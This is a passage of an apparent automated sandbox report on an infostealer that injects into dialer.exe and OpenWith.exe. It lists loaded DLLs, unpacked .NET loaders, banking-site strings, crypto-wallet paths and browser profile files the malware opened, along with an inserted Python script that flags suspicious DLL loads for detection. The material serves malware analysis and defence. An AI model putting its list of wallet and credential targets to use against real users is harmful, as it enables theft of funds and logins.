Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: mpr.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: powrprof.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: umpdc.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: wbemcomn.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: wbemcomn.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: mswsock.dll |
Source: C:\Windows\System32\OpenWith.exe |
Section loaded: cryptbase.dll |
Source: C:\Windows\System32\OpenWith.exe |
Section loaded: netapi32.dll |
Source: C:\Windows\System32\OpenWith.exe |
Section loaded: netutils.dll |
Source: C:\Windows\System32\OpenWith.exe |
Section loaded: mswsock.dll |
Source: C:\Windows\System32\OpenWith.exe |
Section loaded: dpapi.dll |
Source: C:\Windows\System32\OpenWith.exe |
Section loaded: uxtheme.dll |
Source: C:\Windows\System32\OpenWith.exe |
Section loaded: wkscli.dll |
Source: C:\Windows\System32\OpenWith.exe |
Section loaded: cscapi.dll |
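The loaded-module rows give a behaviour-level view of the two hollowed host processes. The following added example, not part of the report, reads an abridged copy of those rows and flags loads that do not belong in either host: dialer.exe (the 32-bit Phone Dialer under SysWOW64, which legitimately pulls in tapi32.dll) and OpenWith.exe (the 64-bit "Open with" dialog host). The watchlist of libraries and the reasons attached to them are the example's own choices; tune it for your environment before using it as a rule.

```python
"""Flag DLL loads that change the meaning of a host process.

Added example, not part of the sandbox report. REPORT is an abridged copy of
the "Section loaded" rows above; WATCHLIST and its reasons are this example's
own choices, not anything the report states.
"""
import re
from pathlib import PureWindowsPath

REPORT = r"""
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Section loaded: apphelp.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: tapi32.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: wbemcomn.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: amsi.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: userenv.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: wbemcomn.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: mswsock.dll |
Source: C:\Windows\System32\OpenWith.exe |
Section loaded: cryptbase.dll |
Source: C:\Windows\System32\OpenWith.exe |
Section loaded: netapi32.dll |
Source: C:\Windows\System32\OpenWith.exe |
Section loaded: mswsock.dll |
Source: C:\Windows\System32\OpenWith.exe |
Section loaded: dpapi.dll |
Source: C:\Windows\System32\OpenWith.exe |
Section loaded: uxtheme.dll |
"""

# Libraries whose presence in a GUI utility that has no business doing network,
# WMI or credential work is worth a detection. Reasons are the example's own.
WATCHLIST = {
    "mswsock.dll": "Winsock service provider: the process is doing socket I/O",
    "dpapi.dll": "DPAPI: decrypting blobs protected for this user (browser credential stores rely on it)",
    "wbemcomn.dll": "WMI client runtime: system enumeration or WMI-based execution",
    "amsi.dll": "AMSI interface: normally pulled in by script or .NET hosts, not a native GUI utility",
}

ROW_RE = re.compile(r"Source: (\S+) \|\s*Section loaded: (\S+) \|")


def parse_loads(text):
    """Return [(image basename, dll lowercased)] for every Section loaded row."""
    return [(PureWindowsPath(path).name, dll.lower())
            for path, dll in ROW_RE.findall(text)]


def flag_loads(loads, watchlist=WATCHLIST):
    """Return [(image, dll, reason)], once per image/dll pair, in first-seen order."""
    seen, hits = set(), []
    for image, dll in loads:
        if dll in watchlist and (image, dll) not in seen:
            seen.add((image, dll))
            hits.append((image, dll, watchlist[dll]))
    return hits


def by_image(hits):
    """Group flagged DLL names under the image that loaded them."""
    grouped = {}
    for image, dll, _ in hits:
        grouped.setdefault(image, []).append(dll)
    return grouped


if __name__ == "__main__":
    for image, dll, reason in flag_loads(parse_loads(REPORT)):
        print(f"{image:14s} {dll:14s} {reason}")
```

On the rows above this yields wbemcomn.dll, amsi.dll and mswsock.dll for dialer.exe and mswsock.dll plus dpapi.dll for OpenWith.exe; the dropper wdeeFKntav.exe itself only shows apphelp.dll. The same pairing of image and loaded module maps directly onto Sysmon Event ID 7 (ImageLoaded), so the watchlist can be turned into a host rule keyed on those two image names.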
Source: |
Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831L source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: wkernel32.pdb source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115365389.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115429018.0000000004E30000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: wkernelbase.pdb source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ntdll.pdb source: wdeeFKntav.exe, 00000000.00000003.2111775317.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112323721.00000000047B0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114700103.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114865216.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: wntdll.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112684749.0000000004760000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115217738.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115079095.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp |
Binary string: ntdll.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2111775317.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112323721.00000000047B0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114700103.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114865216.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp |
Binary string: wntdll.pdb source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112684749.0000000004760000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115217738.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115079095.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp |
Binary string: wkernelbase.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp |
Binary string: wkernel32.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115365389.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115429018.0000000004E30000.00000004.00000001.00020000.00000000.sdmp |
Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbf source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp |
Source: 3.3.OpenWith.exe.25b16e1aad0.8.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.8.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.3.OpenWith.exe.25b16e1aad0.4.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.4.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.3.OpenWith.exe.25b16e1aad0.10.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.10.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.3.OpenWith.exe.25b16e1aad0.16.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.16.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.3.OpenWith.exe.25b16e1aad0.13.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.13.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.3.OpenWith.exe.25b16e1aad0.0.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.0.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.2.OpenWith.exe.25b16e1aad0.1.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.2.OpenWith.exe.25b16e1aad0.1.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.3.OpenWith.exe.25b16e1aad0.6.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.6.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.3.OpenWith.exe.25b16e1aad0.14.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.14.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.3.OpenWith.exe.25b16e1aad0.5.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.5.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.3.OpenWith.exe.25b16e1aad0.2.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.2.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.3.OpenWith.exe.25b16e1aad0.7.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.7.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.3.OpenWith.exe.25b16e1aad0.3.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.3.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_3_00CC5AF4 pushad ; retf |
0_3_00CC5B03 |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_3_00CC6285 push F693B671h; retf |
0_3_00CC628A |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_3_00CC7C52 push dword ptr [edx+ebp+3Bh]; retf |
0_3_00CC7C5F |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_3_00CC5DCE push edi; iretd |
0_3_00CC5DD5 |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_3_00CC2F4E push eax; retf |
0_3_00CC2F4F |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_3_00CC6F48 push es; ret |
0_3_00CC6F49 |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_3_00CC416F push ecx; iretd |
0_3_00CC417B |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_3_00CC657C push esi; ret |
0_3_00CC6580 |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_3_00CC412F pushad ; ret |
0_3_00CC4137 |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_2_00C79429 push cs; retf |
0_2_00C79565 |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_2_00C78964 push ebx; retf |
0_2_00C78965 |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_2_00C7750E push ds; iretd |
0_2_00C77517 |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_2_00C81269 push edx; retf |
0_2_00C81422 |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_2_00C7FF22 push edi; iretd |
0_2_00C7FF2D |
Source: C:\Windows\SysWOW64\dialer.exe |
Code function: 2_3_02723E4E push edi; iretd |
2_3_02723E55 |
Source: C:\Windows\SysWOW64\dialer.exe |
Code function: 2_3_02725CD2 push dword ptr [edx+ebp+3Bh]; retf |
2_3_02725CDF |
Source: C:\Windows\SysWOW64\dialer.exe |
Code function: 2_3_02723B74 pushad ; retf |
2_3_02723B83 |
Source: C:\Windows\SysWOW64\dialer.exe |
Code function: 2_3_02724305 push F693B671h; retf |
2_3_0272430A |
Source: C:\Windows\SysWOW64\dialer.exe |
Code function: 2_3_027245FC push esi; ret |
2_3_02724600 |
Source: C:\Windows\SysWOW64\dialer.exe |
Code function: 2_3_027221EF push ecx; iretd |
2_3_027221FB |
Source: C:\Windows\SysWOW64\dialer.exe |
Code function: 2_3_02724FC8 push es; ret |
2_3_02724FC9 |
Source: C:\Windows\SysWOW64\dialer.exe |
Code function: 2_3_02720FCE push eax; retf |
2_3_02720FCF |
Source: C:\Windows\SysWOW64\dialer.exe |
Code function: 2_3_027221AF pushad ; ret |
2_3_027221B7 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F044CA0 push edx; ret |
3_2_00007DF41F044CAB |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F049D1E push esi; retf 000Ah |
3_2_00007DF41F049D1F |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552 |
Source: OpenWith.exe, 00000003.00000003.2332693555.0000025B16D94000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkcLinkSymbolicLink |
Source: OpenWith.exe, 00000003.00000003.2327644911.0000025B16FFB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+ |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: account.microsoft.com/profileVMware20,11696487552u |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: discord.comVMware20,11696487552f |
Source: OpenWith.exe, 00000003.00000003.2339792801.0000025B16DB4000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkmbolicLinkSymbolicLink |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: bankofamerica.comVMware20,11696487552x |
Source: OpenWith.exe, 00000003.00000003.2339792801.0000025B16DB4000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkLinkcLinkSymbolicLink |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: www.interactivebrokers.comVMware20,11696487552} |
Source: dialer.exe, 00000002.00000002.2240725076.0000000002BA8000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3331408408.0000025B14E80000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ms.portal.azure.comVMware20,11696487552 |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552 |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552 |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: global block list test formVMware20,11696487552 |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: tasks.office.comVMware20,11696487552o |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: AMC password management pageVMware20,11696487552 |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: interactivebrokers.co.inVMware20,11696487552d |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: interactivebrokers.comVMware20,11696487552 |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dev.azure.comVMware20,11696487552j |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - HKVMware20,11696487552] |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: netportal.hdfcbank.comVMware20,11696487552 |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~ |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: outlook.office365.comVMware20,11696487552t |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^ |
Source: dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: DisableGuestVmNetworkConnectivity |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: outlook.office.comVMware20,11696487552s |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552 |
Source: dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: EnableGuestVmNetworkConnectivity |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: turbotax.intuit.comVMware20,11696487552t |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696487552x |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696487552} |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552 |
Source: OpenWith.exe, 00000003.00000003.2331811835.0000025B16E48000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: !CP:Defichain-Electrum |
Source: OpenWith.exe, 00000003.00000003.2319977059.0000025B16E29000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: %AppData%\ElectronCash\config |
Source: OpenWith.exe, 00000003.00000003.2331811835.0000025B16E48000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: %AppData%\com.liberty.jaxx |
Source: OpenWith.exe, 00000003.00000003.2287811243.0000025B16D6A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: %AppData%\Exodus\exodus.wallet |
Source: OpenWith.exe, 00000003.00000003.2287811243.0000025B16D6A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: passphrase.json |
Source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: \??\C:\Users\user\AppData\Roaming\BinanceP |
Source: OpenWith.exe, 00000003.00000003.2318510901.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: %AppData%\Coinomi\Coinomi\wallets |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main\ms-language-packs |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\safebrowsing\google4 |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\921a1560-5524-44c0-8495-fce7014dcfba |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2 |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\startupCache |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\safebrowsing |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache |
Source: C:\Windows\System32\OpenWith.exe |
